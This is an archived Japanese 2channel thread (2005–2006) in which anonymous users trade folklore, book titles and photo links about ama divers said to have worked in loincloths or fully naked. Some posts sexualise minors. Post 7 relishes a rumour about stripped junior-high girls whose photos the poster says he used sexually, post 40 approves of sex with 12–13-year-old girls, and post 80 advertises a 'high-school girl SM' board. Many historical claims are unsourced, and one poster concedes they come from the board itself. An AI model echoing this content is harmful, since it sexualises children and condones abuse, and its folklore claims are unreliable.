5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

裸海女-縄ふんどし一丁から全裸まで

1 :むき出し娘:2005/08/15(月) 15:56:07
 福岡県鐘崎を発祥の地とする、対馬曲や石川県輪島市舳倉島などの
縄ふんどし一丁の裸体で潜水漁を行い、殿様から士分に取り立てられ
海の武士として、海士の称号を賜った上海女から、生まれたまんまの
すっぽんぽんの格好で潜水漁を行い、どうやら差別されていたらしい
最下級海女まで、語りつくしてちょうだい。

2 :天之御名無主:2005/08/15(月) 16:23:54
神奈川大のK月先生は、ここ数年、海女の研究してるんじゃないの?
なにか論文出してる?

3 :ふんどし海女:2005/08/16(火) 12:31:47
ttp://www.fundoshi-bikini.net/nihon-fundoshi/nihon_fundoshi-0-2(ama).htm

ここに写真付きで詳しく載っているよ!

4 :天之御名無主:2005/08/16(火) 17:33:24
なんとも、なんとも日本には知らないことが多すぎる・・w

5 :天之御名無主:2005/08/21(日) 12:16:33
海女さん(伊勢だけだったかな?)頭に魔除けのドーマンセーマンを刺繍した布を巻いているのはなぜ?他の地域も魔除けとかつけているんだろうか?

6 :天之御名無主:2005/08/22(月) 14:26:28
裸海女は、ふんどしに稚拙な男女性器とか、男女交尾の絵を描いて、重要な
魔除けとしていたそうです、古くは陰毛を剃って、その部分に、勃起した男根の
刺青をした地方もあるそうです。

7 :和田キア子:2005/08/25(木) 14:08:20
 陰毛を剃ったあとに、情夫の名前を刺青するってのは、昔のスケ番がやってたなあ
ルーツは海女の風習だったのか、俺が通っていた中学は無茶苦茶な不良校だったので
刺青の有無を確かめるために、不良少女数人をすっ裸にして、陰毛を剃り、
ペン先でつついて入れた刺青を発見した三人を全裸で刺青の箇所を自分の指で
指し示した格好で、始業から深夜まで職員室に立たせたという噂が流れ、校長やら
担任やらが首になった、実際はプールの女子更衣室に立たせたもので、男はだれも
見ていなかったそうだが、番長グループが秘かに写真を撮っており、二三枚もらって
長年おかずにしておりました。

8 :天之御名無主:2005/08/27(土) 01:20:31
>>1
>>生まれたまんまのすっぽんぽんの格好で潜水漁を行い、
>>どうやら差別されていたらしい最下級海女

推測だけど、こういう人たちは売春婦も兼業していたのか?
それとも単に人間以下の扱いで褌すら与えられなかったのか??

9 :天之御名無主:2005/08/29(月) 15:09:55
 九十九里浜って写真集みた、海女じゃあないけど、漁村の人達って、昭和二十年
台後半までは、男女ともすっ裸で漁業やってたんだね。

10 :天之御名無主:2005/08/29(月) 21:32:38
泳ぎやすさとか水圧とかの関係でハダカの方が潜りにはよかったので、全裸、あるいはふんどし一丁の海女さんが昔はほとんどだったそうですね。
女が潜って獲物を捕って生業をたてていたわけですから、海女の村では男よりも女の力が強かったといいます。
差別されていたなど、とんでもない。売春婦兼業だなんて、あなた、ものを知らないにも限度というがあります。

11 :天之御名無主:2005/09/06(火) 20:47:50
 千葉県御宿の海女は、観光客が増えた昭和初年になって、短い木綿のパンツ
をはきだしたが、それ以前は全裸、パンツをはきだしてからも、写生旅行にきた
画家や画学生の求めに応じ居て、気軽に全裸になってモデルを勤めた、これは
屈辱的なものではなく、海女社会は完全な女性上位なので、生っちろい東京の
客に肉体美を見せてやるべいってな、彼女達の露出趣味を満足させるためのものだった。



12 :天之御名無主:2005/09/06(火) 21:59:12
>>11
出典を教えてくださいな♪誰のなんて本に出てましたか?

13 :天之御名無主:2005/09/06(火) 23:49:28
>>11
「海女の群像」持ってるけど、全裸姿はパンツを洗ってるところしかないな。おじさんはまだフルチンで網引きしてるが。
全裸の写真や絵があるならムチャクチャ見てみたいよ。


14 :天之御名無主:2005/09/07(水) 00:28:57
あああああああたたたあああああああたたたあああああああたたた あああああああたたた

15 :秘境探検隊:2005/09/16(金) 12:45:24
各地の海女さんの、ふんどしは一般に刊行されている書籍に載っている物よりも
もっともっと際どい物なので、出来れば大学の図書館の書庫検索をさせてもらったり
して本物の記録に接しましょう、昔はなにしろ陰毛がはみ出てると出版できないので
学術調査用の写真を撮ったあとで、海女さんに頼み込んで股布の幅が広いふんどし
に変えてもらって発表用の写真を取り直したりしています、また、大学の学術調査
が入るというので、地元の識者や駐在の巡査なんかが、勝手におめぇたち、そんだら
こっ恥ずかしい格好で、でぇがくの偉れえ先生方の前におんでたら失礼だっぺよ
なんて事で、勝手な衣装を用意して着替えさしたりしてるので本当の姿がわかりません
舳倉島の海女さんのふんどし、「サイジ」なんかでも本物は股布の幅が五センチ
程も無く、絣ではなく日本手ぬぐいみたいな極薄の木綿で、なるほど、これでは
新聞や雑誌には載せられないなってのが本物です、この写真、別の場所の海女の
博物館で見たもので、地元でなきゃあ出せるんだって思いました、ここは、うちは
早くから文明開化して、ふんどしなんてハンカくさいもんじゃあなくって、洋風の
ズロースをはいてましたって、当地の海女さんの写真を飾ってましたが、黒々と
透けてました、それに勇気あることに、ズロースの前ははいてなかったって
書いてました、ふんどし海女発祥の地でも、本来とは違う姿の海女さん銅像
をつくって、磯襦袢に越中ふんどし姿をアピールしてますが、ここも昔は
これって、ちいさな木綿の縄褌の実物を展示してます、民俗学を専攻してなくても
書庫を検索させてくれる学校もあるから、図書館で相談して、本物にふれてください
また、今は陰毛は公表できるんだから、本当の姿を載せた写真集を発売して
ほしいな。


16 :ぷりっとこ:2005/09/16(金) 17:51:55
地方の新聞社がだしてる郷土資料書籍をあさればサイジ姿の海女さん写真は当然載っているよ。
だけど、日本人の体格って相当変化したからね。ご婦人の下着も進化したからね。
今の日本人のほうが欧米型になってきたんじゃないかな。期待している人はがっかりするかも。
でも資料としちゃあいいですよ。石川県のヘグラ島は延喜式にある興津姫神社があるよ。
国定公園と思ったけど上空はF−15のG訓練海域だよ。当然御神域だから落ちた事もあるよ。
危ないけど、みんな無事だよ。よかったね。こちらの海女さんのお守り印は伊勢とはちがう。
「大」だよ。大国主大神の大だね。九州から移ってきたって言うけど
古代から海女さんはいるヨ。万葉集にも歌われているからね。
今はウエットスーツでしょぉ。シーズンオフは水商売のお姉さんになって
家計を助けているよ。タフだよね。

17 :天之御名無主:2005/09/18(日) 10:09:45
ポリネシアのPerl Diver っていう本を見た
おそらく15歳くらいの少女が丸い水中眼鏡だけを身につけて全裸で海底に潜って漁をしていた
ふんどしもパンツも何も身に着けないんだね

18 :天之御名無主:2005/09/18(日) 11:22:46
裸を恥ずかしがるなんて西洋由来の歴史のない風習
日本でもちょっと前までは混浴も普通だったし
道ばたや電車の中で乳丸出しで赤ん坊に授乳するのは
全く日常の光景だった

19 :天之御名無主:2005/09/18(日) 16:44:04
>道ばたや電車の中で乳丸出しで赤ん坊に授乳

現在20代中盤の俺だが、お母さんがおっぱいあげてる光景--記憶あるなぁ。
ただ、丸出しではなくて隠してたけど。

関係ないが俺のガキのころは電車内で普通に煙草吸ってたし、ポイ捨てが悪という「常識」もなかった。
時代の様子は変わってるんだねぇ(しみじみ)

20 :通りすがり:2005/09/18(日) 16:52:17
裸を恥ずかしがるのは、近代の西洋文化です。
古代から中世くらいまでは、西洋でも半裸体の女性は珍しくないそうです。
明治に日本に来たヨーロッパ人が、混浴を見て驚いたそうです。
「こんなことを我が国でやったら風俗か乱れる」
それ程日本は男女が裸でも整然としていたのでしょう
それは今度の米国のハリケーンを見てもよくわかります

21 :ぶりっとこ:2005/09/18(日) 20:50:52
サイジ、tバックなんだけどアワビなどを捕るときに特殊な金属へらを
用いるのだけど。オーヒガネって言うんだ。 ヒヒイロガネじゃあないよ。
それは竹内文献のスレだね。
そんな道具を携帯する為のtバックじゃなかったかな。
軍隊の手榴弾をぶらさげたり弾倉を携帯する為のサスペンダーと同じ役割だよね。
そういや海女さんの仕事場の能登沖で冷戦時の話だけどソ連のね超音速爆撃機
バックファイヤーがね領空侵犯してたと思ったけど。ニュースで映像が流れたよ。
もう一機の爆撃機ベアとニュースで行ってたけどとこ氏は空中給油機能を備えた
コックと見抜き、物干し竿で給油を阻止しようとしたんだ。
野村某氏も、それじゃとどかん!といって脚立を貸したそうだ。
もちろん地元の人は気づかない。
まあこの漁場にはしょっちゅうスクランブルがかかっているからね。

22 :天之御名無主:2005/09/19(月) 14:04:27
質問

ヘクラの海女の写真を見ると、双眼の水中眼鏡をつけている。これはガラスでできているよね。
よく海女の歴史では江戸時代から云々の記述があるが、ガラスを使ったメガネというのは近代
の話だよね。ヘクラの周囲は10m以上の深みが多いから、メガネ無しでは漁はできない。

ガラス製の水中眼鏡が無い時代にヘクラの海女はどうやって漁をしていたんだろう

23 :ぷりっとこ:2005/09/19(月) 17:33:11
大伴家持さんの時代に海女さんがアワビとってるからねえ。
なれりゃ、できるのかな?学校のプールじゃ水中めがねつけないでしょぉ?
お祝いに使うのし紙ののしは、のしアワビからきてるからね。
でも弥生時代にガラスはあったんじゃないの?
それとも水晶をえいって、目にあててたのかな?琥珀を薄く切ってサングラスぅ。
江戸じゃ目がね。あったっしょ。天体望遠鏡もあるんだからぁ。

24 :天之御名無主:2005/09/25(日) 16:54:08
日本はおおらかだったんだな〜

25 :ルナマリア:2005/09/26(月) 18:03:46
坂東眞紗子の桃色浄土という小説に明治初期の海女の様子が鮮明に描かれていますよ。水中めがねなんてつけてなかったよ。外人から水中めがねをもらって驚くシーンがあった。

26 :天之御名無主:2005/10/20(木) 11:43:02
http://tmp5.2ch.net/test/read.cgi/joke/1129646247/54
このレスで、昨日自爆テロを予告した「全裸で2ch」の「全裸爺」。

ただいま降臨!もみ消し工作のために必死の活動中ですw
http://tmp5.2ch.net/test/read.cgi/joke/1129646247/

ただし、人大杉のため専用ブラウザあるいは携帯電話からしか
アクセスできません。

27 :天之御名無主:2005/10/21(金) 20:55:38
別スレにあった、ふんどしも穿かない丸裸で漁をする全裸海女集団のことを取り上げてるロマンポルノの海女シリーズのタイトルって知ってる人いる?

28 :7誌:2005/10/22(土) 01:12:01
<27さんへ…「くいこみ海女」「潮吹き海女」「色情海女」

29 :27:2005/10/22(土) 07:30:02
>>28
トンクス

今度DVDになったやつでいいのね?

30 :7誌:2005/10/22(土) 07:43:48
<27さん、DVD見ましたが丸裸で海に潜っていませんでした。
ロマンポルノ、他の海女シリーズも発売されそうですが丸裸で、と
言うのはありえないのでは…?実在した本物の丸裸海女の映像
見てみたいものですね…今となっては如何しようもありませんね。

31 :天之御名無主:2005/10/22(土) 12:44:39
つまり、日本人を裸族だと言いたいわけね?

32 :天之御名無主:2005/10/22(土) 18:21:02
しかし本当に丸裸で海に潜って漁をする海女というのは実在したのか?
丸裸の意味はあるのか?

33 :27:2005/10/22(土) 19:54:41
昔は木綿布が貴重だったとか水の抵抗がどうたらとか女ばっかりのコミュニ
ティ内だから気にならないとか理由はいろいろ挙がってるけどどれも説得力
はないね。
本当に実在したとしても、明治以後の日本でそんなの記録に残せないわな。


34 :天之御名無主:2005/10/24(月) 23:22:27
日本はいい国だったんだな〜

35 :天之御名無主:2005/10/25(火) 13:33:51
なんで?

36 :天之御名無主:2005/10/27(木) 21:36:19
ビキニ女性の絵はがき販売禁止 リオ州議会が条例
2005年10月27日20時50分

 ビキニ姿の女性を写した絵はがきの販売を禁止する――。世界中の観光客が集ま
るブラジル・リオデジャネイロの州議会が25日、こんな条例案を可決した。

 提案した女性議員は現地紙に「買春ツアーを奨励しているようなもので、街の印象
を損ねる」と趣旨を語った。政府は、少女買春などの撲滅に力を入れている。

 コパカバーナなどリオの海岸は、「フィオ・デンタル(糸ようじ)」と呼ばれる、ひものよ
うに細いビキニを着けた女性たちの日光浴が日常の風景になっている。

http://www.asahi.com/international/update/1027/014.html

37 :天之御名無主:2005/11/01(火) 22:43:12
昭和何年頃までいたのかな?

38 :天之御名無主:2005/11/02(水) 22:47:56
小学校のとき、ふんどしで泳がされた(4〜6年)。散々、女子にからかわれた。
先生に「何で女子はふんどしじゃないの?」って聞いたら、「女だからだ」って。
あの先生にこのスレ見せてやりたいよ、まったく。

39 :天之御名無主:2005/11/03(木) 18:53:47
県立図書館へ行ったら中村由信の「海女」写真集があったんでめくってみたら、
目次の次のページが長崎県対馬曲の海女の写真でいきなり縄ふんどし一丁の
全裸海女の尻のアップが見開きになってた。
文化の日に図書館で読める代物じゃねーな。

40 :天之御名無主:2005/11/04(金) 18:04:06



49 :天之御名無主 :01/10/11 15:10
昨日本屋で夜這いに関する本があったので読んだら驚いた。昔の日本の田舎ってすごい思った。だってただで12、3歳の女の子とHができたんだよ。誰にも怒られずに。毛がはえはじめたから夜這いOKとか月経が始まったから夜這いOKとか認定されたりしてたんだってさ。


41 :天之御名無主:2005/11/05(土) 12:10:20
健康的過ぎて萎える。

42 :天之御名無主:2005/11/06(日) 14:29:18
まあ、女性も褌は締めていただろうな
水中メガネは昔は無かっただろう

43 :天之御名無主:2005/11/08(火) 12:22:35
作り物じゃなく海女の写真とか動画ってどこにあるの?

44 :天之御名無主:2005/11/08(火) 19:47:00
>>7
おいらもそんな時代に生まれたかったです。

45 :天之御名無主:2005/11/08(火) 19:54:13
>>43
文献を探せば幾らでもありますよ。
写真の都合上、多少ポーズを極めてもらったり露出を隠してもらったりすることはあるでしょうが、
それを「作り物」と捉えるのであれば、自分の足で志摩なり舳倉なりに赴いて撮影させてもらうしかないでしょう。

46 :天之御名無主:2005/11/15(火) 06:26:32
千葉に謝罪したい

47 :天之御名無主:2005/11/16(水) 22:09:07
>46
なぜ?

48 :天之御名無主:2005/11/23(水) 21:31:35
そもそもふんどし海女ってのはどういう過程で生まれたんだ?
もともと全裸の海女が道具を持って潜る為にふんどしをつけたのか?
それとも腰巻海女が水中でより邪魔にならないふんどしに穿き替えたのか?

49 :とてちん:2005/11/24(木) 17:41:22
ぬれたら重い素材の衣類の時代には裸の方がいいんじゃない?


50 :天之御名無主:2005/11/28(月) 15:23:19
服を着てると海から上がった時に体温を奪うんじゃないかな?
最初から裸だったらそのまま拭けば済むし。
潜水服になった今でもよく砂浜で焚き火にあたってるでしょう。
それか水中で纏わりついて邪魔になったり絡まって危険なので
どんどん裸になっていった、か。

51 :天之御名無主:2005/11/28(月) 21:44:19
>>それか水中で纏わりついて邪魔になったり絡まって危険なので
>>どんどん裸になっていった、か。

もしこれがホントのとこなら、全裸海女はありえないね。
ふんどしまで脱ぐ必要は無いもんな


52 :天之御名無主:2005/11/29(火) 01:29:10
むしろ逆ではありませんか?
褌には貝を採る為の金属の棒を挟んでるじゃないですか。
最初は全裸で出発したんですよきっと。で、素手で採ってたんじゃないですか?
それがやがて岩にへばりついてるような貝を採る為に道具が必要になった。
商品経済の発達に伴って自給自足から生産を上げなければならなくなったから?
しかし常時それを手で握ってるわけには行かないから潜る時や上がる時は挟む為に
褌を使うようになったとかですか?あるいは男への配慮ですかね?
昭和30年代頃までは男の海女(海士と言ったらしいですが)も居たらしいし。

53 :天之御名無主:2005/11/29(火) 02:58:20
トルコの難破船とかメキシコの難破船とかいろいろ救助している

54 :天之御名無主:2005/12/05(月) 14:32:58
 職業海女が領主から特権を与えられている場所で、賤民視されていた階層の
娘が、おめこぼしを願うために全裸でこそこそ潜っていたらしい、物凄く排他的で
地元の小学校校長が写した写真しか残っていないらしい、侍分の上海女に潜っている
ところを見つかると海が穢れると半殺しにされたそうだ。

55 :天之御名無主:2005/12/08(木) 06:48:19
出典は何?
校長先生の写真てのは現存してるの?

56 :天之御名無主:2005/12/08(木) 11:19:40
小学校って明治以降じゃん。領主って何よ?

57 :天之御名無主:2005/12/12(月) 13:04:10
>>54
難しい話はいーから、写真うpしる

58 :天之御名無主:2005/12/19(月) 13:22:11
さすがにないだろ
いつ頃のことか和歌爛が

59 :天之御名無主:2005/12/21(水) 12:57:12
つーか、昔の日本女性の体なんて貧相なもんだ。
そんなものを見るよりは、そこらで下品な雑誌を立ち読みしたほうがよほどいいんじゃないか?

60 :天之御名無主:2005/12/21(水) 13:48:10
>>59
貧相だらけというわけではないし、下品なエロ雑誌とはわけが違う


61 :天之御名無主:2005/12/21(水) 16:09:20
じゃあどんな高尚な興味があって、100年前の真面目に仕事してる女の裸を見たがるんだか。

62 :天之御名無主:2005/12/30(金) 01:38:44
別に裸で仕事する必然性の無い(現在では)女がかつては全裸同然で仕事してたっつーのに対するシチュエーション萌えだろう
まあそれだけならエロ雑誌への興味と変わらんが


63 :天之御名無主:2006/01/05(木) 13:15:38
>>43
海女−ものと人間の文化史  田辺悟    法政大学出版局  1993 
http://item.rakuten.co.jp/book/608250/
海女の歴史に関する記述も詳細にわたっている。海女を語る上ではさけて通れない書籍。
海女の島−舳倉島  F.マイラーニ/訳:牧野文子  未来社  1964
https://bookweb.kinokuniya.co.jp/guest/cgi-bin/wshosea.cgi?W-ISBN=4-624-20058-6
1960年代とおぼしき舳倉島の海女の生活を写真と共に描いたルポルタージュ。

64 :天之御名無主:2006/01/05(木) 13:49:34
>>9
>漁村の人達って、昭和二十年台後半までは、男女ともすっ裸で
>漁業やってたんだね...
青木繁が、明治37年夏に福田たね等と千葉県安房布良海岸に逗留して
描いた漁民群像画の「海の幸」を観たことないのかね。全員全裸。  
http://library.town.kosugi.toyama.jp/kaiga/63.htm

65 :天之御名無主:2006/01/05(木) 22:17:14
>>64
あれはゲージツだからみんな全裸なんだと思ってた
マジなのか

66 :天之御名無主:2006/01/06(金) 01:47:08
>>64
>>65

漁民の男はフルチソで、どういったまじないかチソポに藁を
巻いていたというのを読んだことあり。
(どこの地方かとかは、忘れたが)

67 :天之御名無主:2006/01/06(金) 22:58:08
>>66
>>9の内容が、それだな。

全裸男漁師がいたのは事実らしいが、
女のほうは全く聞いたこと無いな。
腰巻、磯パンツ、褌一丁ってのは割と簡単に見つかる。

68 :天之御名無主:2006/01/07(土) 09:14:13
>>66
まじないなどうかわからないが、おちんちんの尿道から
悪い虫が入って来ないように、という意味らしい

ちなみに、サイジも同様に、女の膣に海中の虫やら
微生物が入って 妙な病気や炎症を抑える、、、、とか、、、

69 :文吾:2006/01/09(月) 11:53:27
すると海で働く姿、やはり始めの頃は男女とも素裸と考えても良さそうですね。
舳倉島の場合、女はサイジ一つなのに男はしっかり服着て待機していますね。
周りに沢山のサイジ一つの女がいて浮気心擽られなかったのでしょうか…?
女の乳房ばかりか、海から上がってサイジを外す瞬間を毎日見られた男は
幸せ者ですね…当時の島の子に生まれたかったですね…。


【参考】写真集「九十九里浜」小関与四郎 http://shumpu.com/99/


70 :天之御名無主:2006/01/14(土) 14:14:41
オッペシという房総の漁師の娘は浜仕事をするときは全裸、馬方の娘も川で
馬を洗うときは全裸、狸掘るという原始的な石炭採掘をやっていた下罪人の
娘も全裸、下級武士の娘がお屋敷奉公するときには、いつ殿様から夜伽を命じられても
いいように御老女様から全裸身体検査された、終戦直後の新円切り替えで
急遽紙幣印刷を命じられた印刷所では女工のケツの穴に指を突っ込んで全裸身体検査
した、バスの女子車掌はもっと物凄い方法で身体検査されてた。

71 :天之御名無主:2006/01/15(日) 01:41:12
いつ頃撮られたか分からないけど、みうらじゅんの
"カスハガの世界"にもサイジ姿、パンツ一丁の海女
のものがあるね。

72 :天之御名無主:2006/01/18(水) 12:57:19
あげ

73 :龍華:2006/01/21(土) 19:25:23
写真に撮られている海女さん、若い海女さんて
少ないと思うのですが、中学を卒業したら海女に
なると聞きましたが、そんなピチピチの海女さんの
写真を見たいと思うのですが、無理でしょうね(^^ゞ

74 :天之御名無主:2006/01/23(月) 01:19:14
>>63
海女関係の文献は結構読んだけど、全裸だったなんてどこにもなかったよ
このスレのみんなは、どっからそんな情報を?


75 :天之御名無主:2006/01/23(月) 11:56:44
>>74
全裸の情報は、2chでゲトしました
信頼度ゼロです

76 :天之御名無主:2006/01/24(火) 17:20:47
昔の出版事情を考えるべきです、あぶない写真は掲載禁止なんだから全裸の
海女さんがいても、ふんどしとか腰巻とかしてもらってから撮影してる事も
ある、アフリカの土人にパンツはかせて撮影するのと一緒だよ。

77 :天之御名無主:2006/01/24(火) 22:07:59
>>76
だったら全裸の事実があっても世に出回らねーじゃん?
それがこんなに語られてるってことは・・・?

そっか、ヒトの口に戸は立てられんのか

78 :天之御名無主:2006/01/26(木) 15:00:12
隣の国の孤島の海女も実は赤裸と呼ばれていて全裸で潜水漁をしていた、巡査
がうるさく言うようになってでっちあげた衣装を古来からの物だと歴史を歪曲
している、この国ではついこないだまで一般人が海水浴するときにも全裸だった
すっ裸の男女が浜辺を埋める観光案内書が出回っていたよ。

79 :天之御名無主:2006/01/28(土) 02:10:03
>>78
見たことないなぁ
明治後期や大正の海水浴写真では長襦袢みたいなもの着ていたけど

80 :若葉:2006/01/30(月) 12:04:35
女子高生SM掲示板
http://i-bbs.sijex.net/imageBoard.jsp?id=zyoshinosm
どうぞよろしくお願いします。

81 :天之御名無主:2006/02/01(水) 14:14:37
結局さ、一般には出版されてないけれど、大学や民族学博物館の書庫には
お宝映像が眠ってるわけですよ、あと新聞社とかね、ライブドア事件でも
自殺の状況や背景なんて報道機関は知ってても都合の悪いことは一切言わない
でしょう。

82 :天之御名無主:2006/02/02(木) 23:12:02
昔の炭鉱は男も女も半裸で記録写真にも残ってるよね
過酷な労働条件でとてもそんな事にこだわっている余裕は無かったらしいが。
昔は職種によっては男女裸でもこだわらなかったようですね。
そう言えば日本も20年前は病院の待合室とかで授乳で
ポロンとおっぱい出すお母さん多かったですよね。
子供心にそれ見るの結構楽しみだった。
最近は全然見ないね。

83 :天之御名無主:2006/02/10(金) 21:06:28
昨年くらいの朝日新聞の千葉版に、「昭和初年の○○海岸にての漁風景」という写真が載ってますたが、
その漁師さんたちのうちの確実にひとりは、全裸でしたよ。横紐がないのがはっきりわかる。
しかもまわりに観光客らしいひとたちも大勢いるようだった。
股間は影になっていたが。
まあこれは男性の場合ですがね。


84 :天之御名無主:2006/02/15(水) 21:21:38
海女学に強い大学や博物館ってどこ?
突撃してこようと思いまつ
近くなら

85 :天之御名無主:2006/02/28(火) 15:44:37
>>84
つ国会図書館

86 :天之御名無主:2006/02/28(火) 19:23:10
なんで海女さんは女性だけなのか知ってる使徒いる?

87 :天之御名無主:2006/03/01(水) 01:12:13
>>86
体脂肪が厚いかららしい。
他にも理由があると思うがしらん。

88 :天之御名無主:2006/03/01(水) 02:50:47
>>82
炭鉱では夫婦や内縁関係、将来を契りあったもの、或いは周りの世話焼きが
くっつけようとした男女がペアになってた例が大多数じゃなかったか?
恥かしさはあまりなかったと思う。

>>86
海女は女に決まってる。
男は海士だろう?
両方併せて海部ってんじゃね?

お、海部俊樹も海士海女の出かな?

89 :天之御名無主:2006/03/01(水) 16:01:58
>>88
潜るのは女だけ。ヒント*猿

伊勢、伊豆などでは女性しか海に潜らないんだよね。男(ダンナ)は船に
乗り、女がギリギリまで水中で作業できるよう綱をにぎり引き上げる作業をする。



90 :天之御名無主:2006/03/01(水) 17:01:05
伊勢の海女さんはドーマン、セーマン陰陽師のマークを頭巾に描いてるらしいね。

91 :天之御名無主:2006/03/05(日) 21:27:37
>>69
>女の乳房ばかりか、海から上がってサイジを外す瞬間を毎日見られた男は
>幸せ者ですね…当時の島の子に生まれたかったですね…
現代の生活環境に染まった発言だな。胸や股間は、平生覆われて隠されている
からこそ男は見たいと思い、見て興奮するのだよ。始終露出されてる環境だと
見られて幸せとかいう感興は薄れるのだよ。TVで放映される熱帯原住民の
女たちの乳丸出し勢揃い姿を見て、原住民の男たちが興奮してるように見え
るかね。
もっとも往時の農漁村は、早婚で十代で出産多産も普通で、ブラなんぞの着用
習慣もなかったから、若い女でも乳の膨らみは、垂れ凋みかげんだったろうな。     

92 :89:2006/03/10(金) 18:56:13
だれも書かないから><

答え:海女さんの先祖、伊勢的(∈伊豆も)神話によると猿田ヒコが海に潜って漁をしてたところ
貝に手を挟まれ死んでしまったことによると思う。だからカミさんの天のウズメ(後猿田ヒコ
と結婚後猿女君)=女が漁をするんだわこれは伊勢、伊豆なんかではとくに顕著。


93 :天之御名無主:2006/03/21(火) 18:41:51

今NHKのホリデーにっぽんみてたら海士潜女神社と書いて(あまかずきめ)
と呼ぶ神社の弓祭りの様子がやってた
http://www.city.toba.mie.jp/kanko/miru/jinjya/12-amakazukime.htm

94 :天之御名無主:2006/03/24(金) 23:34:59
>>88
>男は海士だろう?両方併せて海部ってんじゃね?
”士”の字義を知ってるのかね。男は海人。総称も海人。
海部は社会集団、海人部族のこと。
もっとも昨今じゃ潜水夫を潜水士、看護婦を看護士と好字
言い換え風潮が蔓延してるがね。

95 :天之御名無主:2006/04/08(土) 20:28:53
勝手に一旦まとめよう

・昭和30〜40年代まで房総・御宿や対馬・曲、能登・舳倉島といった
地域の海女はふんどしやズロースだけのトップレスで漁をしていた
 この事実は写真集や文献、ビデオなどの多くの資料によって裏付け
られている
 
・当時は裸体に対して寛容で海女に限らず男の漁師も全裸で出漁したり
といった風景が日常的に存在していた

・さらにそれ以前、明治から昭和初期までは何も着てないオールヌード
で潜る海女がいたらしい
 さすがにこれは時代が古すぎる上、交通の便が悪い僻地でしかも排他
的な風土の下でのことなので当時の資料は殆ど残っていない
 
・でも資料館や博物館の書庫には学術研究用の資料が残っている可能性が
ある・・・かも?
 

こんなところかw

96 :天之御名無主:2006/05/11(木) 20:46:43
ふと思ったんだが、
実際に全裸の海女がいたとして、彼女らは頭の被り物はどうしていたんだろう?
前に全裸で泳ぐ理由のひとつとして、当時は木綿布が貴重で云々・・・てなカキコ
があったと思うが、だったらあの頭の布はなんなのだ?
絶対縄ふんどしよりたくさん布使ってるぞw

股間を隠すことよりも髪の毛を優先させたのか?
それとも紐かなんかで髪を結ってたのか?


97 :天之御名無主:2006/05/15(月) 13:05:12
布切れの値段っていうより、身分の象徴としての衣装だから、体制から認知されて
武士として海士の称号まで貰ったふんどし海女と、卑賤の者として一切の着衣を
禁じられた全裸海女って事になる

98 :96:2006/05/15(月) 22:15:55
>>97
労働環境や能率の問題で自主的に全裸になったのではなく、
身分差別によって全裸を強制されてた、ってこと?

ということは、磯ナカネなんかの道具を使うのも制限されてたのかもね。
羞恥心もあったんでは?

99 :天之御名無主:2006/05/16(火) 04:56:40
水中で結っていた髪の毛が解けると視界不良で仕事にならないから海頭巾をしていた

100 :天之御名無主:2006/05/17(水) 09:44:46
100?

101 :天之御名無主:2006/05/25(木) 15:07:32
以前、海岸の調査研究である海辺の村に滞在したとき、村のお年寄りから興味深い話を聞
いたことがある。
海女漁も盛んなその漁村では毎年8月初旬、村のお宮の縁日にあたる夏祭りで、地元の漁
師の若者達(男子)による相撲の大会が行われる。
地方のさびれた漁村とはいえ、夏祭りはやはり村じゅうがもっとも活気づき賑わいをみせ
る。
とりわけこの神事の相撲は今なお人気のあるだし物のひとつで、かつては、厳しい自然を
相手に漁に生きる村の若者達が、日頃鍛えた強靱な肉体を披露して競い合い、また結婚前
のトシごろの娘をもつ家にとっては、その娘のよき縁談相手となる健康優良な男子を見定
めるうえで大きな意味合いをもっていたというから、村びと達の注目も熱く大変な盛り上
がりをみせていたという。
いっぽう、その健康で逞しい婿の相手に見合う嫁選びの方法として、古来の習わしで宮の
土俵にあがることの出来ない若い海女たちは、別に浜辺で行なわれる“はまずもう”とよ
ばれる女子だけの闘いで、褌ひとつかせいぜい胸まわりを粗末なさらしという姿で、その
健康な身体と強さを競ったという。
余談になるが、実際のところその実状たるや“すもう”とは内容的にかけはれたもので
あったらしく、村一番の憧れの男子をめぐる熱き闘いともなれば、とりわけ日頃厳しい自
然を相手に身体を張って生きてる海女の娘たちは強靱な肉体に加えて気性も激しく、その
闘いの様相はまるで女子プロレスさながら、お互い相手に馬乗りになっての取っ組み合い
があたりまえ、エキサイトすればしまいに相手の髪を引っぱる、身体を引っ掻いたりと、
女子ならではの感情にまかせた壮絶な闘いとなったらしい。
いずれにせよ、かつてはこうした伝統のなかに健康で逞しく良質な子孫を残し、永劫末代
の繁栄を願う漁師達の素朴な知恵というものが日常として残されていたという訳なんだろ
うけど、こうした話、全国津々浦々、掘り起こせばもっといろいろ出てくるのではないか
と興味深く聞かせてもらった。

102 :天之御名無主:2006/05/30(火) 03:54:29
漁村の夏のイベントで若い海女のプロレス大会とかやったら盛り上がりそう。

103 :天之御名無主:2006/06/04(日) 19:55:07
すげー素朴な疑問だけど、
昔の海女さんってオッパイ丸出しで漁をしてたじゃない?
水着も着ず、ブラジャーとかもせず、ニプレスもせずに
恥ずかしくなかったのかな?

104 :天之御名無主:2006/06/04(日) 20:37:21
>>103
そういう「必要な露出」が恥ずかしいという感覚になったのは最近だからな。
こどもにおっぱいあげるのとか、そういうのにエロを感じる方が変態だった時代もあったんだよ。

105 :天之御名無主:2006/06/07(水) 03:17:45
>>103
地方の漁村とか行ってみれ。
夏の昼下がり、海辺で漁師の妻たちがすけすけの薄いシュミーズ一枚か
上半身裸トップレスで網の繕いとかやってるよ(さすがにキョービ若い
女のコはそんな格好してないが)。
つまり、裸慣れしてるわけですな。海に生きる人たちは。



106 :天之御名無主:2006/06/16(金) 23:16:05
ばばあのはだかはみたくないw

107 :天之御名無主:2006/06/16(金) 23:24:19
http://www.fundoshi-bikini.net/nihon-fundoshi/shigoto/nf(shigoto).htm
http://www.tauoo.net/photoclub/ama.jpg
http://shumpu.com/99/img/photosample11.jpg
http://nippon.zaidan.info/seikabutsu/2000/01293/images/015-2.jpg

108 :天之御名無主:2006/06/17(土) 14:16:56
大晦日の夜に、海女がすっ裸で松明をかざして寒中水泳するってのは
伊勢のほうだよ

109 :天之御名無主:2006/07/04(火) 17:50:34
↓で「海女」で検索すると昔の海女画像が出てくるよ
https://photobank.mainichi.co.jp/php/KK_search.php


110 :天之御名無主:2006/07/04(火) 22:22:01
国際情報社の「新しい日本」 北陸 富山・石川・福井(昭和38年)で舳倉島の海士の写真を見ました。
ほぼ真後ろから全裸にサイジ(Tバックより細いです)で船から海に飛び込もうとするところで、背中とお尻がアップになっています。
